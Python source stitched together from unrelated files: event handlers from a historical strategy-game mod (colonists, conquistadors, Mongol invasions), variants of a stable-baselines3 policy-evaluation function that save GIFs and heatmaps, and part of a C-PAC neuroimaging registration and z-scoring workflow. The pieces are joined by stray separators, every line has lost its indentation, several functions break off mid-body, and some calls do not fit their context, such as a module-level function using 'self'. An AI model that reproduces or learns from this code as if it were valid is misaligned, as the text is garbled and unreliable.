@handler("BeginGameTurn")
def clearMassilianCulture(iGameTurn):
if iGameTurn == year(dBirth[iSpain])-1:
if scenario() == i600AD:
pMassilia = city_(56, 46)
if pMassilia:
pMassilia.setCulture(pMassilia.getOwner(), 1, True)
@handler("BeginGameTurn")
def ottomansFlipIndependents(iGameTurn):
if iGameTurn == data.iOttomanSpawnTurn + 1:
for city in cities.birth(iOttomans):
iOwner = city.getOwner()
if is_minor(iOwner):
# TODO: this should be better but is not covered by completeCityFlip
flipCity(city, False, True, slot(iOttomans), ())
cultureManager(city, 100, slot(iOttomans), iOwner, True, False, False)
self.convertSurroundingPlotCulture(slot(iOttomans), plots.surrounding(city))
makeUnit(iOttomans, iCrossbowman, city)
@handler("BeginGameTurn")
def createCarthaginianSettler(iGameTurn):
if not player(iPhoenicia).isHuman() and iGameTurn == year(-820) - (data.iSeed % 10):
makeUnit(iPhoenicia, iSettler, tCarthage)
makeUnits(iPhoenicia, iArcher, tCarthage, 2)
makeUnits(iPhoenicia, iWorker, tCarthage, 2)
makeUnits(iPhoenicia, iWarElephant, tCarthage, 2)
# TODO: revisit how this works
@handler("BeginGameTurn")
def checkEarlyColonists():
dEarlyColonistYears = {
-850 : iGreece,
-700 : iCarthage,
-600 : iRome,
-400 : iRome,
}
iYear = game.getGameTurnYear()
if iYear in dEarlyColonistYears:
iCiv = dEarlyColonistYears[iYear]
giveEarlyColonists(iCiv)
@handler("BeginGameTurn")
def checkLateColonists():
if year().between(1350, 1918):
for iCiv in dTradingCompanyPlots:
if player(iCiv).isAlive():
iPlayer = slot(iCiv)
if turn() == data.players[iPlayer].iExplorationTurn + 1 + data.players[iPlayer].iColonistsAlreadyGiven * 8:
giveColonists(iPlayer)
@handler("BeginGameTurn")
def checkRaiders():
if year().between(860, 1250):
if turn() % turns(10) == 9:
giveRaiders(iVikings)
@handler("BeginGameTurn")
def moorishSpawnInMorocoo():
if year() == year(710)-1:
marrakesh = city_(51, 37)
if marrakesh:
marrakesh.setHasReligion(iIslam, True, False, False)
makeUnit(marrakesh.getOwner(), iSettler, marrakesh)
makeUnit(marrakesh.getOwner(), iWorker, marrakesh)
@handler("BeginGameTurn")
def flipChineseStartingCities():
if scenario() == i600AD and year() == scenarioStartTurn():
tTL, tBR = dBirthArea[iChina]
if not player(iChina).isHuman():
tTL = (99, 39) # 4 tiles further north
china = plots.start(tTL).end(tBR)
iNumAICitiesConverted, iNumHumanCitiesToConvert = convertSurroundingCities(slot(iChina), china)
convertSurroundingPlotCulture(slot(iChina), china)
for iMinor in players.independent().barbarian():
flipUnitsInArea(china, slot(iChina), iMinor, False, player(iMinor).isBarbarian())
### FIRST CONTACT ###
@handler("firstContact")
def conquistadors(iTeamX, iHasMetTeamY):
if is_minor(iTeamX) or is_minor(iHasMetTeamY):
return
if year().between(600, 1800):
if civ(iTeamX) in lBioNewWorld and civ(iHasMetTeamY) not in lBioNewWorld:
iNewWorldPlayer = iTeamX
iOldWorldPlayer = iHasMetTeamY
iNewWorldCiv = civ(iNewWorldPlayer)
bAlreadyContacted = data.dFirstContactConquerors[iNewWorldCiv]
# avoid "return later" exploit
if year() <= year(dBirth[iAztecs]) + turns(10):
data.dFirstContactConquerors[iNewWorldCiv] = True
return
if not bAlreadyContacted:
if iNewWorldCiv == iMaya:
tContactZoneTL = (15, 30)
tContactZoneBR = (34, 42)
elif iNewWorldCiv == iAztecs:
tContactZoneTL = (11, 31)
tContactZoneBR = (34, 43)
elif iNewWorldCiv == iInca:
tContactZoneTL = (21, 11)
tContactZoneBR = (36, 40)
lArrivalExceptions = [(25, 32), (26, 40), (25, 42), (23, 42), (21, 42)]
data.dFirstContactConquerors[iNewWorldCiv] = True
# change some terrain to end isolation
if iNewWorldCiv == iInca:
plot(27, 30).setFeatureType(-1, 0)
plot(28, 31).setFeatureType(-1, 0)
plot(29, 23).setPlotType(PlotTypes.PLOT_HILLS, True, True)
plot(31, 13).setPlotType(PlotTypes.PLOT_HILLS, True, True)
plot(32, 19).setPlotType(PlotTypes.PLOT_HILLS, True, True)
plot(27, 29).setPlotType(PlotTypes.PLOT_HILLS, True, True) #Bogota
elif iNewWorldCiv == iAztecs:
plot(40, 66).setPlotType(PlotTypes.PLOT_HILLS, True, True)
newWorldPlots = plots.start(tContactZoneTL).end(tContactZoneBR).without(lArrivalExceptions)
contactPlots = newWorldPlots.where(lambda p: p.isVisible(iNewWorldPlayer, False) and p.isVisible(iOldWorldPlayer, False))
arrivalPlots = newWorldPlots.owner(iNewWorldPlayer).where(lambda p: not p.isCity() and isFree(iOldWorldPlayer, p, bCanEnter=True) and map.getArea(p.getArea()).getCitiesPerPlayer(iNewWorldPlayer) > 0)
if contactPlots and arrivalPlots:
contactPlot = contactPlots.random()
arrivalPlot = arrivalPlots.closest(contactPlot)
iModifier1 = 0
iModifier2 = 0
if player(iNewWorldPlayer).isHuman() and player(iNewWorldPlayer).getNumCities() > 6:
iModifier1 = 1
else:
if iNewWorldCiv == iInca or player(iNewWorldPlayer).getNumCities() > 4:
iModifier1 = 1
if not player(iNewWorldPlayer).isHuman():
iModifier2 = 1
if year() < year(dBirth[active()]):
iModifier1 += 1
iModifier2 += 1
team(iOldWorldPlayer).declareWar(iNewWorldPlayer, True, WarPlanTypes.WARPLAN_TOTAL)
iInfantry = getBestInfantry(iOldWorldPlayer)
iCounter = getBestCounter(iOldWorldPlayer)
iCavalry = getBestCavalry(iOldWorldPlayer)
iSiege = getBestSiege(iOldWorldPlayer)
iStateReligion = player(iOldWorldPlayer).getStateReligion()
iMissionary = missionary(iStateReligion)
if iInfantry:
makeUnits(iOldWorldPlayer, iInfantry, arrivalPlot, 1 + iModifier2, UnitAITypes.UNITAI_ATTACK_CITY)
if iCounter:
makeUnits(iOldWorldPlayer, iCounter, arrivalPlot, 2, UnitAITypes.UNITAI_ATTACK_CITY)
if iSiege:
makeUnits(iOldWorldPlayer, iSiege, arrivalPlot, 1 + iModifier1 + iModifier2, UnitAITypes.UNITAI_ATTACK_CITY)
if iCavalry:
makeUnits(iOldWorldPlayer, iCavalry, arrivalPlot, 2 + iModifier1, UnitAITypes.UNITAI_ATTACK_CITY)
if iMissionary:
makeUnit(iOldWorldPlayer, iMissionary, arrivalPlot)
if iNewWorldCiv == iInca:
makeUnits(iOldWorldPlayer, iAucac, arrivalPlot, 3, UnitAITypes.UNITAI_ATTACK_CITY)
elif iNewWorldCiv == iAztecs:
makeUnits(iOldWorldPlayer, iJaguar, arrivalPlot, 2, UnitAITypes.UNITAI_ATTACK_CITY)
makeUnit(iOldWorldPlayer, iHolkan, arrivalPlot, UnitAITypes.UNITAI_ATTACK_CITY)
elif iNewWorldCiv == iMaya:
makeUnits(iOldWorldPlayer, iHolkan, arrivalPlot, 2, UnitAITypes.UNITAI_ATTACK_CITY)
makeUnit(iOldWorldPlayer, iJaguar, arrivalPlot, UnitAITypes.UNITAI_ATTACK_CITY)
message(iNewWorldPlayer, 'TXT_KEY_FIRST_CONTACT_NEWWORLD')
message(iOldWorldPlayer, 'TXT_KEY_FIRST_CONTACT_OLDWORLD')
@handler("firstContact")
def mongolConquerors(iTeamX, iHasMetTeamY):
if civ(iHasMetTeamY) == iMongols and not player(iMongols).isHuman():
iCivX = civ(iTeamX)
if iCivX in lMongolCivs:
if year() < year(1500) and data.isFirstContactMongols(iCivX):
data.setFirstContactMongols(iCivX, False)
teamTarget = team(iTeamX)
if iCivX == iArabia:
tTL = (73, 31)
tBR = (84, 43)
iDirection = DirectionTypes.DIRECTION_EAST
elif iCivX == iPersia:
tTL = (73, 37)
tBR = (86, 48)
iDirection = DirectionTypes.DIRECTION_NORTH
elif iCivX == iByzantium:
tTL = (68, 41)
tBR = (77, 46)
iDirection = DirectionTypes.DIRECTION_EAST
elif iCivX == iRussia:
tTL = (68, 48)
tBR = (81, 62)
iDirection = DirectionTypes.DIRECTION_EAST
lTargetList = getBorderPlots(iTeamX, tTL, tBR, iDirection, 3)
if not lTargetList: return
team(iMongols).declareWar(iTeamX, True, WarPlanTypes.WARPLAN_TOTAL)
iHandicap = 0
if teamtype(iTeamX).isHuman():
iHandicap = game.getHandicapType() / 2
for tPlot in lTargetList:
makeUnits(iMongols, iKeshik, tPlot, 2 + iHandicap, UnitAITypes.UNITAI_ATTACK_CITY)
makeUnits(iMongols, iMangudai, tPlot, 1 + 2 * iHandicap, UnitAITypes.UNITAI_ATTACK_CITY)
makeUnits(iMongols, iTrebuchet, tPlot, 1 + iHandicap, UnitAITypes.UNITAI_ATTACK_CITY)
message(iTeamX, 'TXT_KEY_MONGOL_HORDE_HUMAN')
if team().canContact(iTeamX):
message(active(), 'TXT_KEY_MONGOL_HORDE', adjective(iTeamX))
### TECH ACQUIRED ###
@handler("techAcquired")
def recordExplorationTurn(iTech, iTeam, iPlayer):
if iTech == iExploration:
data.players[iPlayer].iExplorationTurn = game.getGameTurn()
@handler("techAcquired")
def openIcelandRoute(iTech):
if iTech == iCompass:
plot(49, 62).setTerrainType(iCoast, True, True)
@handler("techAcquired")
def americanWestCoastSettlement(iTech, iTeam, iPlayer):
if iTech == iRailroad and civ(iPlayer) == iAmerica and not player(iPlayer).isHuman():
lWestCoast = [(11, 50), (11, 49), (11, 48), (11, 47), (11, 46), (12, 45)]
enemyCities = cities.of(lWestCoast).notowner(iAmerica)
for iEnemy in enemyCities.owners():
team(iPlayer).declareWar(iEnemy, True, WarPlanTypes.WARPLAN_LIMITED)
for city in enemyCities:
plot = plots.surrounding(city).without(city).land().passable().no_enemies(iPlayer).random()
makeUnits(iPlayer, iMinuteman, plot, 3, UnitAITypes.UNITAI_ATTACK_CITY)
makeUnits(iPlayer, iCannon, plot, 2, UnitAITypes.UNITAI_ATTACK_CITY)
if enemyCities.count() < 2:
for plot in plots.of(lWestCoast).without(enemyCities).sample(2 - enemyCities.count()):
makeUnit(iPlayer, iSettler, plot)
makeUnit(iPlayer, iMinuteman, plot)
@handler("techAcquired")
def russianSiberianSettlement(iTech, iTeam, iPlayer):
if iTech == iRailroad and civ(iPlayer) == iRussia and not player(iPlayer).isHuman():
tVladivostok = (111, 51)
vladivostok = city(tVladivostok)
convertPlotCulture(plot_(tVladivostok), iPlayer, 100, True)
if vladivostok and vladivostok.getOwner() != iPlayer:
spawnPlot = plots.surrounding(tVladivostok).land().passable().where(lambda plot: not city_(plot)).random()
team(iTeam).declareWar(vladivostok.getTeam(), True, WarPlanTypes.WARPLAN_LIMITED)
makeUnits(iPlayer, iRifleman, spawnPlot, 4, UnitAITypes.UNITAI_ATTACK_CITY)
makeUnits(iPlayer, iCannon, spawnPlot, 2, UnitAITypes.UNITAI_ATTACK_CITY)
elif isFree(iPlayer, tVladivostok, True):
player(iPlayer).found(*tVladivostok)
makeUnits(iPlayer, iRifleman, tVladivostok, 2)
for plot in plots.surrounding(tVladivostok):
convertPlotCulture(plot, iPlayer, 80, True)
@handler("techAcquired")
def earlyTradingCompany(iTech, iTeam, iPlayer):
if turn() == scenarioStartTurn():
return
lCivs = [iSpain, iPortugal]
lTechs = [iExploration, iFirearms]
if civ(iPlayer) in lCivs:
if iTech in lTechs and all(team(iTeam).isHasTech(iTech) for iTech in lTechs):
if not player(iPlayer).isHuman() and not team(iTeam).isAVassal():
handleColonialAcquisition(iPlayer)
@handler("techAcquired")
def lateTradingCompany(iTech, iTeam, iPlayer):
if turn() == scenarioStartTurn():
return
lCivs = [iFrance, iEngland, iNetherlands]
lTechs = [iEconomics, iReplaceableParts]
if civ(iPlayer) in lCivs:
if iTech in lTechs and all(team(iTeam).isHasTech(iTech) for iTech in lTechs):
if not player(iPlayer).isHuman() and not team(iTeam).isAVassal():
handleColonialConquest(iPlayer)
### COLLAPSE ###
@handler("collapse")
def removeOrthodoxyFromAnatolia(iPlayer):
if civ(iPlayer) == iByzantium:
removeReligionByArea(plots.region(rAnatolia), iOrthodoxy)
### BIRTH ###
@handler("birth")
def clearDanishCulture(iPlayer):
if civ(iPlayer) == iHolyRome and player(iVikings).isAlive():
for plot in plots.owner(iVikings).land().where(lambda p: map.getArea(p.getArea()).getCitiesPerPlayer(p.getOwner()) == 0):
plot.setCultureConversion(slot(iHolyRome), 100)
### IMPLEMENTATION ###
def relocateCapitals(iPlayer, city):
if player(iPlayer).isHuman():
return
if iPlayer in dRelocatedCapitals:
tCapital = dRelocatedCapitals[iPlayer]
if location(city) == tCapital:
relocateCapital(iPlayer, tCapital)
if civ(iPlayer) == iTurks and isControlled(iPlayer, plots.core(iPersia)):
capital = player(iPlayer).getCapitalCity()
if capital not in plots.core(iPersia):
newCapital = cities.core(iPersia).owner(iPlayer).random()
if newCapital:
relocateCapital(iPlayer, location(newCapital))
def buildCapitalInfrastructure(iPlayer, city):
if iPlayer in dCapitalInfrastructure:
if at(city, plots.capital(iPlayer)) and year() <= year(dSpawn[iPlayer]) + turns(5):
iPopulation, lBuildings, lReligiousBuildings = dCapitalInfrastructure[iPlayer]
if city.getPopulation() < iPopulation:
city.setPopulation(iPopulation)
for iBuilding in lBuildings:
city.setHasRealBuilding(iBuilding, True)
iStateReligion = player(iPlayer).getStateReligion()
if iStateReligion >= 0:
for religiosBuilding in lReligiousBuildings:
city.setHasRealBuilding(religiosBuilding(iStateReligion), True)
def giveEarlyColonists(iCiv):
pPlayer = player(iCiv)
if pPlayer.isAlive() and not pPlayer.isHuman():
capital = pPlayer.getCapitalCity()
if iCiv == iRome:
capital = cities.owner(iCiv).region(rIberia).random()
if capital:
tSeaPlot = findSeaPlots(capital, 1, iCiv)
if tSeaPlot:
makeUnit(iCiv, iGalley, tSeaPlot, UnitAITypes.UNITAI_SETTLER_SEA)
makeUnit(iCiv, iSettler, tSeaPlot)
makeUnit(iCiv, iArcher, tSeaPlot)
def giveColonists(iPlayer):
pPlayer = player(iPlayer)
pTeam = team(iPlayer)
iCiv = civ(iPlayer)
if pPlayer.isAlive() and not pPlayer.isHuman() and iCiv in dMaxColonists:
if pTeam.isHasTech(iExploration) and data.players[iPlayer].iColonistsAlreadyGiven < dMaxColonists[iCiv]:
sourceCities = cities.core(iCiv).owner(iPlayer)
# help England with settling Canada and Australia
if iCiv == iEngland:
colonialCities = cities.start(tCanadaTL).end(tCanadaBR).owner(iPlayer)
colonialCities += cities.start(tAustraliaTL).end(tAustraliaBR).owner(iPlayer)
if colonialCities:
sourceCities = colonialCities
city = sourceCities.coastal().random()
if city:
tSeaPlot = findSeaPlots(city, 1, iCiv)
if not tSeaPlot: tSeaPlot = city
makeUnit(iPlayer, unique_unit(iPlayer, iGalleon), tSeaPlot, UnitAITypes.UNITAI_SETTLER_SEA)
makeUnit(iPlayer, iSettler, tSeaPlot, UnitAITypes.UNITAI_SETTLE)
makeUnit(iPlayer, getBestDefender(iPlayer), tSeaPlot)
makeUnit(iPlayer, iWorker, tSeaPlot)
data.players[iPlayer].iColonistsAlreadyGiven += 1
def giveRaiders(iCiv):
pPlayer = player(iCiv)
pTeam = team(iCiv)
if pPlayer.isAlive() and not pPlayer.isHuman():
city = cities.owner(iCiv).coastal().random()
if city:
seaPlot = findSeaPlots(location(city), 1, iCiv)
if seaPlot:
makeUnit(iCiv, unique_unit(iCiv, iGalley), seaPlot, UnitAITypes.UNITAI_ASSAULT_SEA)
if pTeam.isHasTech(iSteel):
makeUnit(iCiv, unique_unit(iCiv, iHeavySwordsman), seaPlot, UnitAITypes.UNITAI_ATTACK)
makeUnit(iCiv, unique_unit(iCiv, iHeavySwordsman), seaPlot, UnitAITypes.UNITAI_ATTACK_CITY)
else:
makeUnit(iCiv, unique_unit(iCiv, iSwordsman), seaPlot, UnitAITypes.UNITAI_ATTACK)
makeUnit(iCiv, unique_unit(iCiv, iSwordsman), seaPlot, UnitAITypes.UNITAI_ATTACK_CITY)
def handleColonialAcquisition(iPlayer):
pPlayer = player(iPlayer)
iCiv = civ(iPlayer)
targets = getColonialTargets(iPlayer, bEmpty=True)
if | |
to evaluate.
:param env: The gym environment or ``VecEnv`` environment.
:param n_eval_episodes: Number of episode to evaluate the agent
:param deterministic: Whether to use deterministic or stochastic actions
:param render: Whether to render the environment or not
:param callback: callback function to do additional checks,
called after each step. Gets locals() and globals() passed as parameters.
:param reward_threshold: Minimum expected reward per episode,
this will raise an error if the performance is not met
:param return_episode_rewards: If True, a list of rewards and episode lengths
per episode will be returned instead of the mean.
:param warn: If True (default), warns user about lack of a Monitor wrapper in the
evaluation environment.
:return: Mean reward per episode, std of reward per episode.
Returns ([float], [int]) when ``return_episode_rewards`` is True, first
list containing per-episode rewards and second containing per-episode lengths
(in number of steps).
"""
is_monitor_wrapped = False
# Avoid circular import
from stable_baselines3.common.monitor import Monitor
if not isinstance(env, VecEnv):
env = DummyVecEnv([lambda: env])
is_monitor_wrapped = is_vecenv_wrapped(env, VecMonitor) or env.env_is_wrapped(Monitor)[0]
if not is_monitor_wrapped and warn:
warnings.warn(
"Evaluation environment is not wrapped with a ``Monitor`` wrapper. "
"This may result in reporting modified episode lengths and rewards, if other wrappers happen to modify these. "
"Consider wrapping environment first with ``Monitor`` wrapper.",
UserWarning,
)
n_envs = env.num_envs
episode_rewards = []
episode_lengths = []
episode_counts = np.zeros(n_envs, dtype="int")
# Divides episodes among different sub environments in the vector as evenly as possible
episode_count_targets = np.array([(n_eval_episodes + i) // n_envs for i in range(n_envs)], dtype="int")
current_rewards = np.zeros(n_envs)
current_lengths = np.zeros(n_envs, dtype="int")
observations = env.reset()
states = None
frames = [[] for _ in range(n_eval_episodes)]
current_episode = 0
while (episode_counts < episode_count_targets).any():
env.render('human')
actions, states = model.predict(observations, state=states, deterministic=deterministic)
observations, rewards, dones, infos = env.step(actions)
current_rewards += rewards
current_lengths += 1
for i in range(n_envs):
frames[current_episode].append(np.moveaxis(env.render("rgb_array"), 2, 0))
if episode_counts[i] < episode_count_targets[i]:
# unpack values so that the callback can access the local variables
reward = rewards[i]
done = dones[i]
info = infos[i]
if callback is not None:
callback(locals(), globals())
if dones[i]:
if is_monitor_wrapped:
# Atari wrapper can send a "done" signal when
# the agent loses a life, but it does not correspond
# to the true end of episode
if "episode" in info.keys():
# Do not trust "done" with episode endings.
# Monitor wrapper includes "episode" key in info if environment
# has been wrapped with it. Use those rewards instead.
episode_rewards.append(info["episode"]["r"])
episode_lengths.append(info["episode"]["l"])
# Only increment at the real end of an episode
episode_counts[i] += 1
else:
episode_rewards.append(current_rewards[i])
episode_lengths.append(current_lengths[i])
episode_counts[i] += 1
current_episode += 1
current_rewards[i] = 0
current_lengths[i] = 0
if states is not None:
states[i] *= 0
if render:
env.render()
print("Saving gifs... ")
gif_path = os.path.join(path, "gif")
os.makedirs(gif_path)
for i in range(n_eval_episodes):
write_gif(np.array(frames[i]),
os.path.join(gif_path, "{}.gif".format(i)),
1/0.1)
print("Done.")
mean_reward = np.mean(episode_rewards)
std_reward = np.std(episode_rewards)
if reward_threshold is not None:
assert mean_reward > reward_threshold, "Mean reward below threshold: " f"{mean_reward:.2f} < {reward_threshold:.2f}"
if return_episode_rewards:
return episode_rewards, episode_lengths
return mean_reward, std_reward
def evaluate_policy_heatmap(
model: "base_class.BaseAlgorithm",
env: Union[gym.Env, VecEnv],
n_eval_episodes: int = 10,
deterministic: bool = True,
render: bool = False,
callback: Optional[Callable[[Dict[str, Any], Dict[str, Any]], None]] = None,
reward_threshold: Optional[float] = None,
return_episode_rewards: bool = False,
warn: bool = True,
path: str = '',
gif: bool = False,
heatmap: int = False
) -> Union[Tuple[float, float], Tuple[List[float], List[int]]]:
"""
Runs policy for ``n_eval_episodes`` episodes and returns average reward.
If a vector env is passed in, this divides the episodes to evaluate onto the
different elements of the vector env. This static division of work is done to
remove bias. See https://github.com/DLR-RM/stable-baselines3/issues/402 for more
details and discussion.
.. note::
If environment has not been wrapped with ``Monitor`` wrapper, reward and
episode lengths are counted as it appears with ``env.step`` calls. If
the environment contains wrappers that modify rewards or episode lengths
(e.g. reward scaling, early episode reset), these will affect the evaluation
results as well. You can avoid this by wrapping environment with ``Monitor``
wrapper before anything else.
:param model: The RL agent you want to evaluate.
:param env: The gym environment or ``VecEnv`` environment.
:param n_eval_episodes: Number of episode to evaluate the agent
:param deterministic: Whether to use deterministic or stochastic actions
:param render: Whether to render the environment or not
:param callback: callback function to do additional checks,
called after each step. Gets locals() and globals() passed as parameters.
:param reward_threshold: Minimum expected reward per episode,
this will raise an error if the performance is not met
:param return_episode_rewards: If True, a list of rewards and episode lengths
per episode will be returned instead of the mean.
:param warn: If True (default), warns user about lack of a Monitor wrapper in the
evaluation environment.
:return: Mean reward per episode, std of reward per episode.
Returns ([float], [int]) when ``return_episode_rewards`` is True, first
list containing per-episode rewards and second containing per-episode lengths
(in number of steps).
"""
is_monitor_wrapped = False
# Avoid circular import
from stable_baselines3.common.monitor import Monitor
if not isinstance(env, VecEnv):
env = DummyVecEnv([lambda: env])
is_monitor_wrapped = is_vecenv_wrapped(env, VecMonitor) or env.env_is_wrapped(Monitor)[0]
if not is_monitor_wrapped and warn:
warnings.warn(
"Evaluation environment is not wrapped with a ``Monitor`` wrapper. "
"This may result in reporting modified episode lengths and rewards, if other wrappers happen to modify these. "
"Consider wrapping environment first with ``Monitor`` wrapper.",
UserWarning,
)
n_envs = env.num_envs
episode_rewards = []
episode_lengths = []
episode_counts = np.zeros(n_envs, dtype="int")
# Divides episodes among different sub environments in the vector as evenly as possible
episode_count_targets = np.array([(n_eval_episodes + i) // n_envs for i in range(n_envs)], dtype="int")
current_rewards = np.zeros(n_envs)
current_lengths = np.zeros(n_envs, dtype="int")
observations = env.reset()
states = None
grid = np.zeros((n_eval_episodes, env.get_attr("height")[0],
env.get_attr("width")[0]), dtype=np.float64)
total_steps = [0 for _ in range(n_eval_episodes)]
current_episode = 0
while (episode_counts < episode_count_targets).any():
env.render('human')
actions, states = model.predict(observations, state=states, deterministic=deterministic)
observations, rewards, dones, infos = env.step(actions)
current_rewards += rewards
current_lengths += 1
for i in range(n_envs):
total_steps[current_episode] += 1
grid[current_episode][env.get_attr("agent_pos")[0][1]][env.get_attr("agent_pos")[0][0]] += 1
if episode_counts[i] < episode_count_targets[i]:
# unpack values so that the callback can access the local variables
reward = rewards[i]
done = dones[i]
info = infos[i]
if callback is not None:
callback(locals(), globals())
if dones[i]:
if is_monitor_wrapped:
# Atari wrapper can send a "done" signal when
# the agent loses a life, but it does not correspond
# to the true end of episode
if "episode" in info.keys():
# Do not trust "done" with episode endings.
# Monitor wrapper includes "episode" key in info if environment
# has been wrapped with it. Use those rewards instead.
episode_rewards.append(info["episode"]["r"])
episode_lengths.append(info["episode"]["l"])
# Only increment at the real end of an episode
episode_counts[i] += 1
else:
episode_rewards.append(current_rewards[i])
episode_lengths.append(current_lengths[i])
episode_counts[i] += 1
current_episode += 1
current_rewards[i] = 0
current_lengths[i] = 0
if states is not None:
states[i] *= 0
if render:
env.render()
print("Saving heatmaps... ")
heatmap_path = os.path.join(path, "heatmap")
os.makedirs(heatmap_path)
def save_heatmap(i):
fig, ax = plt.subplots()
x = list(range(1, env.get_attr("height")[0] - 1))
y = list(range(1, env.get_attr("width")[0] - 1))
real_grid = grid[i, 1:len(x) + 1, 1:len(y) + 1] / total_steps[i]
im, cbar = heatmap_(real_grid, x, y, cmap="YlGn", cbarlabel="# of steps [%] with total {}".format(total_steps[i]))
texts = annotate_heatmap(im, valfmt="{x:.3f}")
fig.tight_layout()
plt.savefig(os.path.join(heatmap_path, '{}.png'.format(i)))
for i in range(n_eval_episodes):
save_heatmap(i)
print("Done.")
mean_reward = np.mean(episode_rewards)
std_reward = np.std(episode_rewards)
if reward_threshold is not None:
assert mean_reward > reward_threshold, "Mean reward below threshold: " f"{mean_reward:.2f} < {reward_threshold:.2f}"
if return_episode_rewards:
return episode_rewards, episode_lengths
return mean_reward, std_reward
def evaluate_policy_gif_heatmap(
model: "base_class.BaseAlgorithm",
env: Union[gym.Env, VecEnv],
n_eval_episodes: int = 10,
deterministic: bool = True,
render: bool = False,
callback: Optional[Callable[[Dict[str, Any], Dict[str, Any]], None]] = None,
reward_threshold: Optional[float] = None,
return_episode_rewards: bool = False,
warn: bool = True,
path: str = '',
gif: bool = True,
heatmap: bool = True
) -> Union[Tuple[float, float], Tuple[List[float], List[int]]]:
"""
Runs policy for ``n_eval_episodes`` episodes and returns average reward.
If a vector env is passed in, this divides the episodes to evaluate onto | |
import nipype.interfaces.fsl as fsl
import nipype.pipeline.engine as pe
import nipype.interfaces.utility as util
from nipype.interfaces.afni import preprocess
from CPAC.registration import create_nonlinear_register, \
create_register_func_to_anat, \
create_bbregister_func_to_anat, \
create_wf_calculate_ants_warp, \
create_wf_apply_ants_warp, \
create_wf_c3d_fsl_to_itk, \
create_wf_collect_transforms
from CPAC.utils import Configuration, function, find_files
from CPAC.utils.utils import extract_one_d, set_gauss, \
process_outputs, get_scan_params, \
get_tr, extract_txt, create_log, \
create_log_template, extract_output_mean, \
create_output_mean_csv, get_zscore, \
get_fisher_zscore, dbg_file_lineno, add_afni_prefix
# Apply warps, Z-scoring, Smoothing, Averages
def output_to_standard(workflow, output_name, strat, num_strat, pipeline_config_obj,
map_node=False, input_image_type=0):
nodes = strat.get_nodes_names()
if 'apply_ants_warp_functional_to_standard' in nodes:
# ANTS WARP APPLICATION
# convert the func-to-anat linear warp from FSL FLIRT to
# ITK (ANTS) format
fsl_to_itk_convert = create_wf_c3d_fsl_to_itk(input_image_type,
map_node,
name='{0}_fsl_to_itk_{1}'.format(output_name, num_strat))
# collect the list of warps into a single stack to feed into the
# ANTS warp apply tool
collect_transforms = create_wf_collect_transforms(map_node,
name='{0}_collect_transforms_{1}'.format(output_name, num_strat))
# ANTS apply warp
apply_ants_warp = create_wf_apply_ants_warp(map_node,
name='{0}_to_standard_{1}'.format(
output_name, num_strat),
ants_threads=int(pipeline_config_obj.num_ants_threads))
apply_ants_warp.inputs.inputspec.dimension = 3
apply_ants_warp.inputs.inputspec.interpolation = 'Linear'
apply_ants_warp.inputs.inputspec.reference_image = \
pipeline_config_obj.template_brain_only_for_func
apply_ants_warp.inputs.inputspec.input_image_type = \
input_image_type
# affine from FLIRT func->anat linear registration
node, out_file = strat['functional_to_anat_linear_xfm']
workflow.connect(node, out_file, fsl_to_itk_convert,
'inputspec.affine_file')
# reference used in FLIRT func->anat linear registration
node, out_file = strat['anatomical_brain']
workflow.connect(node, out_file, fsl_to_itk_convert,
'inputspec.reference_file')
# output file to be converted
node, out_file = \
strat[output_name]
workflow.connect(node, out_file, fsl_to_itk_convert,
'inputspec.source_file')
# nonlinear warp from anatomical->template ANTS registration
node, out_file = strat['anatomical_to_mni_nonlinear_xfm']
workflow.connect(node, out_file, collect_transforms,
'inputspec.warp_file')
# linear initial from anatomical->template ANTS registration
node, out_file = strat['ants_initial_xfm']
workflow.connect(node, out_file, collect_transforms,
'inputspec.linear_initial')
# linear affine from anatomical->template ANTS registration
node, out_file = strat['ants_affine_xfm']
workflow.connect(node, out_file, collect_transforms,
'inputspec.linear_affine')
# rigid affine from anatomical->template ANTS registration
node, out_file = strat['ants_rigid_xfm']
workflow.connect(node, out_file, collect_transforms,
'inputspec.linear_rigid')
# converted FLIRT func->anat affine, now in ITK (ANTS) format
workflow.connect(fsl_to_itk_convert,
'outputspec.itk_transform',
collect_transforms,
'inputspec.fsl_to_itk_affine')
# output file to be converted
node, out_file = strat[output_name]
workflow.connect(node, out_file, apply_ants_warp,
'inputspec.input_image')
# collection of warps to be applied to the output file
workflow.connect(collect_transforms,
'outputspec.transformation_series',
apply_ants_warp,
'inputspec.transforms')
strat.update_resource_pool({
'{0}_to_standard'.format(output_name): (apply_ants_warp, 'outputspec.output_image')
})
strat.append_name(apply_ants_warp.name)
num_strat += 1
else:
# FSL WARP APPLICATION
if map_node:
apply_fsl_warp = pe.MapNode(interface=fsl.ApplyWarp(),
name='{0}_to_standard_{1}'.format(output_name, num_strat),
iterfield=['in_file'])
else:
apply_fsl_warp = pe.Node(interface=fsl.ApplyWarp(),
name='{0}_to_standard_{1}'.format(output_name,
num_strat))
apply_fsl_warp.inputs.ref_file = \
pipeline_config_obj.template_skull_for_func
# output file to be warped
node, out_file = strat[output_name]
workflow.connect(node, out_file, apply_fsl_warp, 'in_file')
# linear affine from func->anat linear FLIRT registration
node, out_file = strat['functional_to_anat_linear_xfm']
workflow.connect(node, out_file, apply_fsl_warp, 'premat')
# nonlinear warp from anatomical->template FNIRT registration
node, out_file = strat['anatomical_to_mni_nonlinear_xfm']
workflow.connect(node, out_file, apply_fsl_warp, 'field_file')
strat.update_resource_pool({'{0}_to_standard'.format(output_name): (apply_fsl_warp, 'out_file')})
strat.append_name(apply_fsl_warp.name)
return strat
def z_score_standardize(workflow, output_name, mask_name,
strat, num_strat, map_node=False):
# call the z-scoring sub-workflow builder
z_score_std = get_zscore(output_name, map_node,
'z_score_std_%s_%d' % (output_name, num_strat))
node, out_file = strat[output_name]
workflow.connect(node, out_file,
z_score_std, 'inputspec.input_file')
# get the mask
if type(mask_name) == str:
node, out_file = strat[mask_name]
workflow.connect(node, out_file,
z_score_std, 'inputspec.mask_file')
else:
# mask_name is a direct file path and not the name of a
# resource pool key
workflow.connect(mask_name, 'local_path',
z_score_std, 'inputspec.mask_file')
strat.append_name(z_score_std.name)
strat.update_resource_pool({'{0}_zstd'.format(output_name): (z_score_std, 'outputspec.z_score_img')})
return strat
def fisher_z_score_standardize(workflow, output_name, timeseries_oned_file,
strat, num_strat, map_node=False):
# call the fisher r-to-z sub-workflow builder
fisher_z_score_std = get_fisher_zscore(output_name, map_node,
'fisher_z_score_std_%s_%d' \
% (output_name, num_strat))
node, out_file = strat[output_name]
workflow.connect(node, out_file, fisher_z_score_std,
'inputspec.correlation_file')
node, out_file = strat[timeseries_oned_file]
